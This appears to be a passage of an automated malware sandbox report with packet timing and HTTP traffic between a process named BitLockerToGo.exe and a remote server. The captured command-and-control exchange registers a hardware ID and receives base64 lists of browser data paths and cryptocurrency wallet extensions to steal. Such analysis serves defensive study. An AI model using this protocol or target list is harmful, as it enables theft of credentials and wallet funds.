                                                                                                                                                              Oct 11, 2024 22:32:45.684124947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684140921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684145927 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684169054 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684179068 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684221029 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684287071 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684334993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684334993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684389114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684420109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684443951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684465885 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684485912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.684602022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.684647083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.688699961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.688718081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.688726902 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.688761950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.688767910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.688808918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.688889980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.688934088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.689141035 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689157963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689166069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689174891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689183950 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:45.689212084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689220905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689244986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689306021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689363003 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689371109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689424038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689431906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689440012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689455032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689464092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689477921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689485073 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689493895 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689563036 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689572096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689579964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689614058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689624071 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689632893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689660072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.689690113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693566084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693576097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693595886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693612099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693769932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693778992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693805933 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693815947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693903923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693912983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693921089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693929911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693969965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693978071 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.693994999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.694056988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.694065094 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.694075108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.694138050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:45.694145918 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:46.799345016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:46.799420118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:46.842623949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:46.847717047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:47.341236115 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:47.341295004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:47.342283964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:47.347122908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:47.813687086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:47.813781023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:50.126072884 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              • 45.66.249.162
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.84970745.66.249.162807772C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Oct 11, 2024 22:32:22.574843884 CEST88OUTGET / HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:23.487524033 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:23.490567923 CEST408OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 208
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 33 38 33 34 38 30 33 38 42 44 30 38 35 36 34 33 38 36 38 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 76 31 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="hwid"938348038BD0856438680------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="build"v1------IDHDGDHJEGHIDGDHCGCB--
                                                                                                                                                              Oct 11, 2024 22:32:24.119239092 CEST375INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 180
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 5a 57 4d 33 59 6a 55 77 4f 54 4d 33 4d 47 56 6a 59 54 49 30 4e 57 4d 78 4d 57 4e 6a 4d 57 4d 34 4e 6a 4d 34 4d 57 46 6a 4f 44 55 32 4e 47 4e 68 59 54 4d 33 4d 44 4e 6d 59 6a 45 79 4f 47 51 35 4d 32 55 31 5a 47 56 6b 59 7a 59 7a 5a 6a 56 68 4e 57 4d 35 4e 7a 67 35 4e 54 63 77 59 7a 4d 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                              Data Ascii: ZWM3YjUwOTM3MGVjYTI0NWMxMWNjMWM4NjM4MWFjODU2NGNhYTM3MDNmYjEyOGQ5M2U1ZGVkYzYzZjVhNWM5Nzg5NTcwYzMzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                              Oct 11, 2024 22:32:24.121002913 CEST468OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 268
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="message"browsers------CBKFIECBGDHJKECAKFBG--
                                                                                                                                                              Oct 11, 2024 22:32:24.588928938 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 1520
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                              Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxV [TRUNCATED]
                                                                                                                                                              Oct 11, 2024 22:32:24.588956118 CEST480INData Raw: 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46
                                                                                                                                                              Data Ascii: cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFB
                                                                                                                                                              Oct 11, 2024 22:32:24.590255976 CEST467OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFB
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 267
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="message"plugins------IJEGDBGDBFIJKECBAKFB--
                                                                                                                                                              Oct 11, 2024 22:32:25.054172993 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 7116
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdh [TRUNCATED]
                                                                                                                                                              Oct 11, 2024 22:32:25.054198980 CEST224INData Raw: 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47
                                                                                                                                                              Data Ascii: bWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98
                                                                                                                                                              Oct 11, 2024 22:32:25.054214001 CEST1236INData Raw: 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 31 68 59 57 4e 6f 63 48 42 75 61 32 70 6e 62 6d 6c 73 5a 48 42 6b 62 57 74 68 59 57 74 6c 61 6d
                                                                                                                                                              Data Ascii: MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2xoa2tlbmZlbHwxfDB8MHxDb2luOTggV2F
                                                                                                                                                              Oct 11, 2024 22:32:25.054236889 CEST1236INData Raw: 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d 39 34 66 47 31 75 5a 6d
                                                                                                                                                              Data Ascii: bXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF
                                                                                                                                                              Oct 11, 2024 22:32:25.054253101 CEST1236INData Raw: 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 35 73 62 57 70 6c 5a 57
                                                                                                                                                              Data Ascii: cGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2F
                                                                                                                                                              Oct 11, 2024 22:32:25.054270029 CEST1236INData Raw: 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 77 77 66 44 42 38 4d 58
                                                                                                                                                              Data Ascii: cGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFd
